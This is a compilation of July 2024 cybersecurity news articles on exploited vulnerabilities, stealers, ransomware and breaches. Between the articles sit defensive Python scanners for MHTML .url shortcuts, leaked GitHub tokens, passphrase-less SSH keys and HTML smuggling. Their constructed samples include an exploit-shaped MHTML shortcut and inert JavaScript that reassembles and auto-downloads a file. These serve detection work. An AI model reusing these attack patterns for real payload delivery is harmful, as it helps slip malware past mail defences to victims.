CVE-2024-38112 has been described by the Windows maker as a spoofing vulnerability in the MSHTML (aka Trident) browser engine used in the now-discontinued Internet Explorer browser. However, the Zero Day Initiative (ZDI) has asserted that it's a remote code execution flaw.
"What happens when the vendor states the fix should be a defense-in-depth update rather than a full CVE?," ZDI's Dustin Childs pointed out. "What happens when the vendor states the impact is spoofing but the bug results in remote code execution?"
Attack chains involve the use of spear-phishing emails embedding links to ZIP archive files hosted on file-sharing sites, which contain URL files that exploit CVE-2024-38112 to redirect the victim to a compromised site hosting a malicious HTML Application (HTA).
Opening the HTA file results in the execution of a Visual Basic Script (VBS) that, in turn, downloads and runs a PowerShell script responsible for retrieving a .NET trojan loader, which ultimately uses the Donut shellcode project to decrypt and execute the Atlantida stealer inside RegAsm.exe process memory.
Atlantida, modeled on open-source stealers like NecroStealer and
PredatorTheStealer, is designed to extract files, screenshots, geolocation, and
sensitive data from web browsers and other applications, including Telegram,
Steam, FileZilla, and various cryptocurrency wallets.
"By using specially crafted URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process," the researchers said.
"This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks."
Not much is known about Void Banshee other than the fact that it has a history of targeting North American, European, and Southeast Asian regions for information theft and financial gain.
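The lure in that chain is an internet shortcut (.url) file inside a ZIP, and a .url file is just an INI file whose [InternetShortcut] section holds the target in a URL= line, so the two markers the researchers cite (the mhtml: protocol handler and the x-usc directive) are easy to screen for at the mail gateway or in a sandbox. The script below is an added example, not from the article or Trend Micro: it opens a ZIP in memory, parses every .url member and reports shortcuts whose target carries either marker. The archive and shortcuts are constructed (example.invalid hosts, no working exploit), and the choice of which extensions to inspect is an assumption.

```python
"""Find internet shortcut (.url) files that invoke the MHTML handler.

Added example, not from the article or Trend Micro. A .url file is an INI
file whose [InternetShortcut] section holds the target in URL=. This scans
a ZIP held in memory and flags shortcuts whose target uses the mhtml:
protocol handler or the x-usc directive. Archive and shortcuts are
constructed; the extension list is an assumption.
"""
import io
import zipfile
from typing import Dict, List

MARKERS = ("mhtml:", "x-usc")
SHORTCUT_EXT = (".url",)


def parse_url_file(text: str) -> Dict[str, str]:
    """Return key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    section, out = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out


def shortcut_findings(name: str, data: bytes) -> List[str]:
    """Describe why one shortcut is suspicious, or return [] if it is not."""
    fields = parse_url_file(data.decode("utf-8", errors="replace"))
    target = fields.get("url", "")
    hits = [m for m in MARKERS if m in target.lower()]
    return [f"{name}: URL uses {', '.join(hits)} -> {target}"] if hits else []


def scan_zip(blob: bytes) -> List[str]:
    """Scan every .url member of a ZIP archive held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(SHORTCUT_EXT):
                findings.extend(shortcut_findings(info.filename, zf.read(info)))
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive: one benign shortcut, one using the MHTML handler."""
    benign = "[InternetShortcut]\r\nURL=https://example.invalid/report.pdf\r\n"
    suspicious = ("[InternetShortcut]\r\n"
                  "URL=mhtml:http://example.invalid/a!x-usc:http://example.invalid/b\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.url", benign)
        zf.writestr("invoice.url", suspicious)
        zf.writestr("readme.txt", "nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for line in scan_zip(build_sample_zip()):
        print(line)
```

A shortcut that names the mhtml: handler has no legitimate reason to reach a user by e-mail; on a fleet where Internet Explorer is nominally retired, any hit here is worth treating as an attempted CVE-2024-38112 delivery regardless of what the rest of the chain looks like.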
The development comes as Cloudflare revealed that threat actors are swiftly incorporating proof-of-concept (PoC) exploits into their arsenal, sometimes as quickly as 22 minutes after their public release, as observed in the case of CVE-2024-27198.
"The speed of exploitation of disclosed CVEs is often quicker than the speed at which humans can create WAF rules or create and deploy patches to mitigate attacks," the web infrastructure company said.
It also follows the discovery of a new campaign that leverages Facebook ads promoting fake Windows themes to distribute another stealer known as SYS01stealer that aims to hijack Facebook business accounts and further propagate the malware.
"Being an infostealer, SYS01 focuses on exfiltrating browser data such as credentials, history, and cookies," Trustwave said. "A big chunk of its payload is focused on obtaining access tokens for Facebook accounts, specifically those with Facebook business accounts, which can aid the threat actors in spreading the malware."
Kaspersky Exits U.S. Market
Following Commerce Department Ban
16.7.24
BigBrothers
The Hacker News
Russian security vendor Kaspersky has said it's exiting the U.S. market nearly a
month after the Commerce Department announced a ban on the sale of its software
in the country citing a national security risk.
News of the closure was first reported by journalist Kim Zetter.
The company is expected to wind down its U.S. operations on July 20, 2024, the same day the ban comes into effect. It's also expected to lay off fewer than 50 employees in the U.S.
"The company has carefully examined and evaluated the impact of the U.S. legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable," the company said in a statement.
In late June 2024, the Commerce Department said it was enforcing a ban after what it said was an "extremely thorough investigation." The company was also added to the Entity List, preventing U.S. enterprises from conducting business with it.
It's currently not known what was uncovered as a result of the probe, but the agency said the company's continued operations in the U.S. could serve as a conduit for the Kremlin's offensive cyber capabilities.
"The manipulation of Kaspersky software, including in U.S. critical infrastructure, can cause significant risks of data theft, espionage, and system malfunction," the Bureau of Industry and Security (BIS) noted. "It can also risk the country's economic security and public health, resulting in injuries or loss of life."
Existing U.S. customers have been urged to find alternative tech solutions ahead of September 29, by which the company is expected to stop providing software and antivirus signature updates.
Kaspersky has refuted the allegations, stating it does not engage in activities that could threaten U.S. national security and that the decision was made based on the "present geopolitical climate and theoretical concerns," rather than a comprehensive evaluation of its products and services.
CISA Warns of Actively Exploited RCE
Flaw in GeoServer GeoTools Software
16.7.24
Exploit
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added
a critical security flaw impacting OSGeo GeoServer GeoTools to its Known
Exploited Vulnerabilities (KEV) catalog, based on evidence of active
exploitation.
GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open Geospatial Consortium (OGC) Web Feature Service (WFS) and Web Coverage Service (WCS) standards.
The vulnerability, tracked as CVE-2024-36401 (CVSS score: 9.8), concerns a case of remote code execution that could be triggered through specially crafted input.
"Multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions," according to an advisory released by the project maintainers earlier this month.
The shortcoming has been addressed in versions 2.23.6, 2.24.4, and 2.25.2. Security researcher Steve Ikeoka has been credited with reporting the flaw.
It's currently not clear how the vulnerability is being exploited in the wild. GeoServer noted that the issue is "confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests."
Also patched by maintainers is another critical flaw (CVE-2024-36404, CVSS score: 9.8) that could also result in RCE "if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input." It has been resolved in versions 29.6, 30.4, and 31.2.
In light of the active abuse of CVE-2024-36401, federal agencies are required to apply the vendor-provided fixes by August 5, 2024.
The development comes as reports have emerged about the active exploitation of a remote code execution vulnerability in the Ghostscript document conversion toolkit (CVE-2024-29510) that could be leveraged to escape the -dSAFER sandbox and run arbitrary code.
The vulnerability, addressed in version 10.03.1 following responsible disclosure by Codean Labs on March 14, 2024, has since been weaponized to obtain shell access to vulnerable systems, according to ReadMe developer Bill Mill.
GitHub Token Leak Exposes Python's
Core Repositories to Potential Attacks
16.7.24
Hacking
The Hacker News
Cybersecurity researchers said they discovered an accidentally leaked GitHub
token that could have granted elevated access to the GitHub repositories of the
Python language, Python Package Index (PyPI), and the Python Software Foundation
(PSF) repositories.
JFrog, which found the GitHub Personal Access Token, said the secret was leaked in a public Docker container hosted on Docker Hub.
"This case was exceptional because it is difficult to overestimate the potential consequences if it had fallen into the wrong hands – one could supposedly inject malicious code into PyPI packages (imagine replacing all Python packages with malicious ones), and even to the Python language itself," the software supply chain security company said.
An attacker could have hypothetically weaponized their admin access to orchestrate a large-scale supply chain attack by poisoning the source code associated with the core of the Python programming language, or the PyPI package manager.
JFrog noted that the authentication token was found inside a Docker container, in a compiled Python file ("build.cpython-311.pyc") that was inadvertently not cleaned up.
Following responsible disclosure on June 28, 2024, the token – which was issued for the GitHub account linked to PyPI Admin Ee Durbin – was immediately revoked. There is no evidence that the secret was exploited in the wild.
PyPI said the token was issued sometime prior to March 3, 2023, and that the exact date is unknown because security logs are only retained for 90 days.
"While developing cabotage-app5 locally, working on the build portion of the codebase, I was consistently running into GitHub API rate limits," Durbin explained.
"These rate limits apply to anonymous access. While in production the system is configured as a GitHub App, I modified my local files to include my own access token in an act of laziness, rather than configure a localhost GitHub App. These changes were never intended to be pushed remotely."
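The leak above survived because a compiled Python file was left in a container image, and compilation does not hide string constants. The following added example (not JFrog's scanner or cabotage's code) builds a .pyc image from a constructed source snippet containing a fake, invalid token, then shows that the same regex finds the token in the compiled bytes. The token shapes in the regex (a four-character classic prefix plus 36 alphanumerics; "github_pat_" plus 22, an underscore and 59 characters for fine-grained tokens) are assumptions about GitHub's published formats, and `scan_tree` is a generic directory walker meant for an extracted image layer.

```python
import importlib.util
import marshal
import os
import re

# Token shapes (assumption about GitHub's formats, see lead-in). No trailing
# word boundary: in marshal output the byte after a string is a type code,
# often a letter, which would defeat a "\b" anchor.
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_])(?:gh[pousr]_[A-Za-z0-9]{36}"
    r"|github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59})"
)

# Constructed, invalid token used only for this demonstration.
FAKE_TOKEN = "ghp_" + "0123456789abcdef0123456789abcdef0123"

# A local "temporary" change of the kind described above: a hard-coded PAT in
# a build helper. Constructed sample, not the project's code.
SOURCE = f'''
import os
GITHUB_TOKEN = "{FAKE_TOKEN}"  # TODO remove before pushing

def auth_headers():
    return {{"Authorization": "Bearer " + GITHUB_TOKEN}}
'''


def compile_to_pyc(source: str, filename: str = "build.py") -> bytes:
    """Build a .pyc image the way CPython lays it out: 16-byte header + marshalled code."""
    code = compile(source, filename, "exec")
    header = importlib.util.MAGIC_NUMBER + b"\x00" * 12  # flags, mtime, size left zero
    return header + marshal.dumps(code)


def find_tokens(data: bytes) -> list[str]:
    """Return every GitHub-token-shaped string in a blob, source or compiled."""
    return TOKEN_RE.findall(data.decode("latin-1"))


def mask(token: str) -> str:
    """Report a hit without echoing the full secret into logs."""
    return token[:8] + "..." + token[-4:]


def scan_tree(root: str) -> list[tuple[str, str]]:
    """Walk an extracted image layer (or any directory) and report masked hits."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            hits.extend((path, mask(t)) for t in find_tokens(data))
    return hits


if __name__ == "__main__":
    pyc = compile_to_pyc(SOURCE)
    print("tokens in source:", [mask(t) for t in find_tokens(SOURCE.encode())])
    print("tokens in .pyc:  ", [mask(t) for t in find_tokens(pyc)])
```

To check a published image rather than a directory, export it with `docker save image:tag -o image.tar`, unpack the layer tarballs, and point `scan_tree` at the result; the scan must cover `__pycache__` directories and other binary files, not only source text, which is exactly where a source-only secret scanner would have missed this one.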
The disclosure comes as Checkmarx uncovered a series of malicious packages on PyPI that are designed to exfiltrate sensitive information to a Telegram bot without victims' consent or knowledge.
The packages in question – testbrojct2, proxyfullscraper, proxyalhttp, and proxyfullscrapers – work by scanning the compromised system for files matching extensions like .py, .php, .zip, .png, .jpg, and .jpeg.
"The Telegram bot is linked to multiple cybercriminal operations based in Iraq," Checkmarx researcher Yehuda Gelb said, noting the bot's message history dates all the way back to 2022.
"The bot functions also as an underground marketplace offering social media manipulation services. It has been linked to financial theft and exploits victims by exfiltrating their data."
CRYSTALRAY Hackers Infect Over 1,500 Victims Using Network Mapping Tool
15.7.24
Hacking
The Hacker News
A threat actor that was previously observed using an open-source network mapping tool has greatly expanded their operations to infect over 1,500 victims.
Sysdig, which is tracking the cluster under the name CRYSTALRAY, said the activities have witnessed a 10x surge, adding it includes "mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple [open-source software] security tools."
The primary objective of the attacks is to harvest and sell credentials, deploy cryptocurrency miners, and maintain persistence in victim environments.
Prominent among the open-source programs used by the threat actor is SSH-Snake, which was first released in January 2024. It has been described as a tool to carry out automatic network traversal using SSH private keys discovered on systems.
The abuse of the software by CRYSTALRAY was documented by the cybersecurity company earlier this February, with the tool deployed for lateral movement following the exploitation of known security flaws in public-facing Apache ActiveMQ and Atlassian Confluence instances.
Joshua Rogers, the developer behind SSH-Snake, told The Hacker News at the time that the tool only automates what would otherwise have been manual steps, and called on companies to "discover the attack paths that exist – and fix them."
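The attack path SSH-Snake automates is a private key stored without a passphrase next to a known_hosts file that names where it works. The added example below (not SSH-Snake and not Sysdig's detection logic) is a defensive audit that classifies private key files by whether they are usable without a passphrase and counts known_hosts entries that list hostnames in clear. It parses the cipher name from the openssh-key-v1 container and the Proc-Type header of legacy PEM files; the sample keys are constructed and contain only the leading fields of the real format, and the default search roots are an assumption.

```python
import base64
import os
import re
import struct

ARMOR_RE = re.compile(
    r"-----BEGIN ([A-Z0-9 ]*PRIVATE KEY)-----\n(.*?)\n-----END \1-----", re.S
)
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(blob: bytes, off: int) -> tuple[bytes, int]:
    """Read one length-prefixed SSH string from blob at offset off."""
    (n,) = struct.unpack_from(">I", blob, off)
    off += 4
    return blob[off:off + n], off + n


def audit_key_text(text: str):
    """Classify a private key file as (format, encrypted), or None if it is not a key.

    The openssh-key-v1 container names its cipher up front: "none" means the
    key material is stored in clear and can be used without any passphrase.
    """
    m = ARMOR_RE.search(text)
    if m is None:
        return None
    label, body = m.group(1), m.group(2)
    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body.split()))
        if not blob.startswith(OPENSSH_MAGIC):
            return ("openssh", None)  # unparseable container
        cipher, off = _ssh_string(blob, len(OPENSSH_MAGIC))
        kdf, _ = _ssh_string(blob, off)
        return ("openssh/" + cipher.decode("ascii"), cipher != b"none")
    if label == "ENCRYPTED PRIVATE KEY":
        return ("pkcs8", True)
    if label == "PRIVATE KEY":
        return ("pkcs8", False)
    # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header.
    return ("pem", "Proc-Type: 4,ENCRYPTED" in body)


def unhashed_known_hosts(text: str) -> int:
    """Count known_hosts lines with hostnames in clear (HashKnownHosts entries start with '|1|')."""
    return sum(
        1 for line in text.splitlines()
        if line.strip() and not line.startswith(("#", "|1|"))
    )


def scan_keys(roots=("/root", "/home")) -> list[tuple[str, str]]:
    """Report every private key under the given roots that is stored without a passphrase."""
    findings = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    if os.path.getsize(path) > 1_000_000:
                        continue
                    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                        result = audit_key_text(fh.read())
                except OSError:
                    continue
                if result and result[1] is False:
                    findings.append((path, result[0]))
    return findings


# Constructed samples: only the leading fields of the openssh-key-v1 container
# are built; a real file continues with KDF options, key count and key sections.
def _fake_openssh_key(cipher: bytes, kdf: bytes) -> str:
    def s(b):
        return struct.pack(">I", len(b)) + b
    blob = OPENSSH_MAGIC + s(cipher) + s(kdf) + s(b"") + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode("ascii")
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


UNPROTECTED_KEY = _fake_openssh_key(b"none", b"none")
PROTECTED_KEY = _fake_openssh_key(b"aes256-ctr", b"bcrypt")
LEGACY_ENCRYPTED_KEY = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "AAAA\n"
    "-----END RSA PRIVATE KEY-----\n"
)
KNOWN_HOSTS = "|1|abc=|def= ssh-ed25519 AAAA\nbuild-01.internal ssh-ed25519 AAAA\n# comment\n"
```

A passphrase-less key is not wrong by itself (automation needs them), but each one found by `scan_keys` should be paired with a restricted `authorized_keys` entry on the target (`from=`, `command=`, `restrict`) so that a stolen key cannot be replayed from an arbitrary host; turning on `HashKnownHosts` removes the hostnames the tool uses to pick its next hop.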
Some of the other tools employed by the attackers include asn, zmap, httpx, and nuclei in order to check if a domain is active and launch scans for vulnerable services such as Apache ActiveMQ, Apache RocketMQ, Atlassian Confluence, Laravel, Metabase, Openfire, Oracle WebLogic Server, and Solr.
CRYSTALRAY also weaponizes its initial foothold to conduct a wide-ranging credential discovery process that goes beyond moving between servers accessible via SSH. Persistent access to the compromised environment is accomplished by means of a legitimate command-and-control (C2) framework called Sliver and a reverse shell manager codenamed Platypus.
In a further bid to derive monetary value from the infected assets, cryptocurrency miner payloads are delivered to illicitly use the victim resources for financial gain, while simultaneously taking steps to terminate competing miners that may have already been running on the machines.
"CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which are then sold on black markets for thousands of dollars," Sysdig researcher Miguel Hernández said. "The credentials being sold involve a multitude of services, including Cloud Service Providers and SaaS email providers."
Singapore Banks to Phase Out OTPs for Online Logins Within 3 Months
15.7.24
Security
The Hacker News
Retail banking institutions in Singapore have three months to phase out the use of one-time passwords (OTPs) for authentication purposes when signing into online accounts to mitigate the risk of phishing attacks.
The decision was announced by the Monetary Authority of Singapore (MAS) and The Association of Banks in Singapore (ABS) on July 9, 2024.
"Customers who have activated their digital token on their mobile device will have to use their digital tokens for bank account logins via the browser or the mobile banking app," the MAS said.
"The digital token will authenticate customers' login without the need for an OTP that scammers can steal, or trick customers into disclosing."
The MAS is also urging customers to activate their digital tokens to safeguard against attacks that are designed to steal credentials and hijack their accounts for conducting financial fraud.
"This measure provides customers with further protection against unauthorized access to their bank accounts," Ong-Ang Ai Boon, director of ABS, said in a statement. "While they may give rise to some inconvenience, such measures are necessary to help prevent scams and protect customers."
While OTPs were originally introduced as a form of second-factor authentication (2FA) to bolster account security, cybercriminals have devised banking trojans, OTP bots, and phishing kits that are capable of harvesting such codes using lookalike sites.
OTP bots, accessible via Telegram and advertised for anywhere between $100 and $420, take social engineering to the next level by calling users and convincing them to enter the 2FA code on their phones to help bypass account protections.
It's important to mention that such bots are mainly designed to plunder a victim's OTP code, necessitating that scammers obtain valid credentials through other means such as data breaches, datasets available for sale on the dark web, and credential harvesting web pages.
"The OTP bot's key task is to call the victim. It is calls that scammers count on, as verification codes are only valid for a limited time," Kaspersky threat researcher Olga Svistunova said in a recent report.
"Whereas a message may stay unanswered for a while, calling the user increases the chances of getting the code. A phone call is also an opportunity to try and produce the desired effect on the victim with the tone of voice."
Last week, SlashNext disclosed details of an "end-to-end" phishing toolkit dubbed FishXProxy that, while ostensibly meant for "educational purposes only," lowers the technical bar for aspiring threat actors looking to mount phishing campaigns at scale while skirting defenses.
"FishXProxy equips cybercriminals with a formidable arsenal for multi-layered email phishing attacks," the company noted. "Campaigns begin with uniquely generated links or dynamic attachments, bypassing initial scrutiny."
"Victims then face advanced antibot systems using Cloudflare's CAPTCHA, filtering out security tools. A clever redirection system obscures true destinations, while page expiration settings hinder analysis and aid campaign management."
Another noteworthy addition to FishXProxy is the use of a cookie-based tracking system that allows attackers to identify and track users across different phishing projects or campaigns. It can also create malicious file attachments using HTML smuggling techniques that make it possible to sidestep detection.
"HTML smuggling is quite effective in bypassing perimeter security controls such as email gateways and web proxies for two main reasons: It abuses the legitimate features of HTML5 and JavaScript, and it leverages different forms of encoding and encryption," Cisco Talos said.
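Because the smuggled file only exists after JavaScript reassembles it in the browser, a gateway that scans attachments as files sees an HTML page. What it can do is score the page for the HTML5 and JavaScript features the technique depends on. The following is an added example (not Talos' or SlashNext's code, and not FishXProxy's output) of such a scorer: it looks for Blob construction, object URLs, the download attribute, base64 decoding and synthetic clicks, and additionally decodes the head of any long base64 literal to check for a file signature. The indicator names, the triage threshold of three indicators and the sample pages are assumptions and constructed data.

```python
import base64
import re

# Heuristics for the technique Talos describes: the file travels as encoded
# text inside the HTML and is rebuilt client-side with HTML5/JavaScript
# features, so the gateway never sees a recognisable attachment.
INDICATORS = {
    "blob_construct":  re.compile(r"new\s+Blob\s*\(", re.I),
    "object_url":      re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "legacy_ie_save":  re.compile(r"msSaveOrOpenBlob", re.I),
    "download_attr":   re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']", re.I),
    "base64_decode":   re.compile(r"\batob\s*\(", re.I),
    "synthetic_click": re.compile(r"\.click\s*\(\s*\)", re.I),
}
# Quoted base64 runs long enough to be worth decoding.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{24,}={0,2})[\"']")
FILE_MAGICS = {b"MZ": "pe", b"PK\x03\x04": "zip", b"%PDF": "pdf", b"Rar!": "rar", b"\x7fELF": "elf"}


def embedded_file_types(html: str) -> list[str]:
    """Decode the head of each base64 literal and look for a known file signature."""
    kinds = []
    for lit in B64_LITERAL.findall(html):
        head = lit[:64]
        head = head[: len(head) - len(head) % 4]  # keep whole 4-character groups
        try:
            raw = base64.b64decode(head)
        except ValueError:
            continue
        for magic, kind in FILE_MAGICS.items():
            if raw.startswith(magic):
                kinds.append(kind)
    return kinds


def detect_html_smuggling(html: str) -> list[str]:
    """Return the names of every indicator that fires on the page."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    hits += ["embedded_" + kind for kind in embedded_file_types(html)]
    return hits


def is_suspicious(html: str, threshold: int = 3) -> bool:
    """Three or more independent indicators is the assumed triage threshold."""
    return len(detect_html_smuggling(html)) >= threshold


# Constructed samples. The "archive" is a ZIP signature followed by zero bytes.
_FAKE_ARCHIVE_B64 = base64.b64encode(b"PK\x03\x04" + bytes(40)).decode("ascii")
SMUGGLING_SAMPLE = f"""<html><body><p>Your invoice is ready.</p>
<script>
var data = "{_FAKE_ARCHIVE_B64}";
var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
a.click();
</script></body></html>"""
BENIGN_SAMPLE = """<html><body><p>Quarterly report attached.</p>
<a href="https://example.test/report.pdf">Download the report</a>
</body></html>"""

if __name__ == "__main__":
    print(detect_html_smuggling(SMUGGLING_SAMPLE), is_suspicious(SMUGGLING_SAMPLE))
    print(detect_html_smuggling(BENIGN_SAMPLE), is_suspicious(BENIGN_SAMPLE))
```

The signature check is deliberately shallow: kits split or XOR the payload so that no single literal decodes to a recognisable header, which is why the behavioural indicators carry most of the weight and why a score, not any one pattern, drives the verdict. Legitimate single-page applications also use Blob and object URLs, so the threshold is a triage setting to tune against your own mail traffic.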
The rise of mobile malware over the years has since also prompted Google to unveil a new pilot program in Singapore that aims to prevent users from sideloading certain apps that abuse Android app permissions to read OTPs and gather sensitive data.
New HardBit Ransomware 4.0 Uses Passphrase Protection to Evade Detection
15.7.24
Ransom
The Hacker News
Cybersecurity researchers have shed light on a new version of a ransomware strain called HardBit that comes packaged with new obfuscation techniques to deter analysis efforts.
"Unlike previous versions, HardBit Ransomware group enhanced the version 4.0 with passphrase protection," Cybereason researchers Kotaro Ogino and Koshi Oyama said in an analysis.
"The passphrase needs to be provided during the runtime in order for the ransomware to be executed properly. Additional obfuscation hinders security researchers from analyzing the malware."
HardBit, which first emerged in October 2022, is a financially motivated threat actor that, similar to other ransomware groups, operates with an aim to generate illicit revenues via double extortion tactics.
What makes the threat group stand out is that it does not operate a data leak site, and instead pressures victims to pay up by threatening to conduct additional attacks in the future. Its primary mode of communication is the Tox instant messaging service.
The exact initial access vector used to breach target environments is currently not clear, although it's suspected to involve brute-forcing RDP and SMB services.
The follow-up steps encompass performing credential theft using tools like Mimikatz and NLBrute, and network discovery via utilities such as Advanced Port Scanner, allowing the attackers to laterally move across the network by means of RDP.
"Having compromised a victim host, the HardBit ransomware payload is executed and performs a number of steps that reduce the security posture of the host before encrypting victim data," Varonis noted in its technical write-up about HardBit 2.0 last year.
Encryption of the victim hosts is carried out by deploying HardBit, which is delivered using a known file infector virus called Neshta. It's worth noting that Neshta has been used by threat actors in the past to also distribute Big Head ransomware.
HardBit is also designed to disable Microsoft Defender Antivirus and terminate processes and services to evade potential detection of its activities and inhibit system recovery. It then encrypts files of interest, updates their icons, changes desktop wallpaper, and alters the system's volume label with string "Locked by HardBit."
Besides being offered to operators in the form of command-line or GUI versions, the ransomware requires an authorization ID in order for it to be successfully executed. The GUI flavor further supports a wiper mode to irrevocably erase files and wipe the disk.
"Once threat actors successfully input the decoded authorization ID, HardBit prompts for an encryption key to encrypt the files on the target machines and it proceeds with ransomware procedure," Cybereason noted.
"Wiper mode feature needs to be enabled by the HardBit Ransomware group and the feature is likely an additional feature that operators need to purchase. If the operators need wiper mode, the operator would need to deploy hard.txt, an optional configuration file of HardBit binary and contains authorization ID to enable wiper mode."
The development comes as cybersecurity firm Trellix detailed a CACTUS ransomware attack that has been observed exploiting security flaws in Ivanti Sentry (CVE-2023-38035) to install the file-encrypting malware using legitimate remote desktop tools like AnyDesk and Splashtop.
Ransomware activity continues to "remain on an upward trend" in 2024, with ransomware actors claiming 962 attacks in the first quarter of 2024, up from 886 attacks in the same quarter of 2023. LockBit, Akira, and BlackSuit have emerged as the most prevalent ransomware families during the time period, Symantec said.
According to Palo Alto Networks' 2024 Unit 42 Incident Response report, the median time it takes to go from compromise to data exfiltration plummeted from nine days in 2021 to two days last year. In almost half (45%) of cases this year, it was just under 24 hours.
"Available evidence suggests that exploitation of known vulnerabilities in public-facing applications continues to be the main vector for ransomware attacks," the Broadcom-owned company said. "Bring Your Own Vulnerable Driver (BYOVD) continues to be a favored tactic among ransomware groups, particularly as a means of disabling security solutions."
AT&T Confirms Data Breach Affecting Nearly All Wireless Customers
13.7.24
Incident
The Hacker News
American telecom service provider AT&T has confirmed that threat actors managed to access data belonging to "nearly all" of its wireless customers as well as customers of mobile virtual network operators (MVNOs) using AT&T's wireless network.
"Threat actors unlawfully accessed an AT&T workspace on a third-party cloud platform and, between April 14 and April 25, 2024, exfiltrated files containing AT&T records of customer call and text interactions that occurred between approximately May 1 and October 31, 2022, as well as on January 2, 2023," it said.
This comprises telephone numbers with which an AT&T or MVNO wireless number interacted – including telephone numbers of AT&T landline customers and customers of other carriers, counts of those interactions, and aggregate call duration for a day or month.
A subset of these records also contained one or more cell site identification numbers, potentially allowing the threat actors to triangulate the approximate location of a customer when a call was made or a text message was sent. AT&T said it will alert current and former customers if their information was involved.
"The threat actors have used data from previous compromises to map phone numbers to identities," Jake Williams, former NSA hacker and faculty at IANS Research, said. "What the threat actors stole here are effectively call data records (CDR), which are a gold mine in intelligence analysis because they can be used to understand who is talking to who — and when."
AT&T's list of MVNOs includes Black Wireless, Boost Infinite, Consumer Cellular, Cricket Wireless, FreedomPop, FreeUp Mobile, Good2Go, H2O Wireless, PureTalk, Red Pocket, Straight Talk Wireless, TracFone Wireless, Unreal Mobile, and Wing.
The name of the third-party cloud provider was not disclosed by AT&T, but Snowflake has since confirmed that the breach was connected to the hack that's impacted other customers, such as Ticketmaster, Santander, Neiman Marcus, and LendingTree, according to Bloomberg.
The company said it became aware of the incident on April 19, 2024, and immediately activated its response efforts. It further noted that it's working with law enforcement in their efforts to arrest those involved, and that "at least one person has been apprehended."
404 Media reported that a 24-year-old U.S. citizen named John Binns, who was previously arrested in Turkey in May 2024, is connected to the security event, citing three unnamed sources. He was also indicted in the U.S. for infiltrating T-Mobile in 2021 and selling its customer data.
AT&T emphasized, however, that the accessed information does not include the content of calls or texts, or personal information such as Social Security numbers, dates of birth, or other personally identifiable information.
"While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number," it said in a Form 8-K filing with the U.S. Securities and Exchange Commission (SEC).
It's also urging users to be on the lookout for phishing, smishing, and online fraud by only opening text messages from trusted senders. On top of that, customers can submit a request to get the phone numbers of their calls and texts in the illegally downloaded data.
The malicious cyber campaign targeting Snowflake has landed as many as 165 customers in the crosshairs, with Google-owned Mandiant attributing the activity to a financially motivated threat actor dubbed UNC5537 that encompasses "members based in North America, and collaborates with an additional member in Turkey."
The criminals have demanded payments of between $300,000 and $5 million in return for the stolen data. The latest development shows that the fallout from the cybercrime spree is expanding in scope and has had a cascading effect.
WIRED revealed last month how the hackers behind the Snowflake data thefts procured stolen Snowflake credentials from dark web services that sell access to usernames, passwords, and authentication tokens that are captured by stealer malware. This included obtaining access through a third-party contractor named EPAM Systems.
For its part, Snowflake this week announced that administrators can now enforce mandatory multi-factor authentication (MFA) for all users to mitigate the risk of account takeovers. It also said it will soon require MFA for all users in newly created Snowflake accounts.
DarkGate Malware Exploits Samba File Shares in Short-Lived Campaign
13.7.24
Virus
The Hacker News
Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate the infections.
Palo Alto Networks Unit 42 said the activity spanned the months of March and April 2024, with the infection chains using servers running public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. Targets included North America, Europe, and parts of Asia.
"This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware," security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan said.
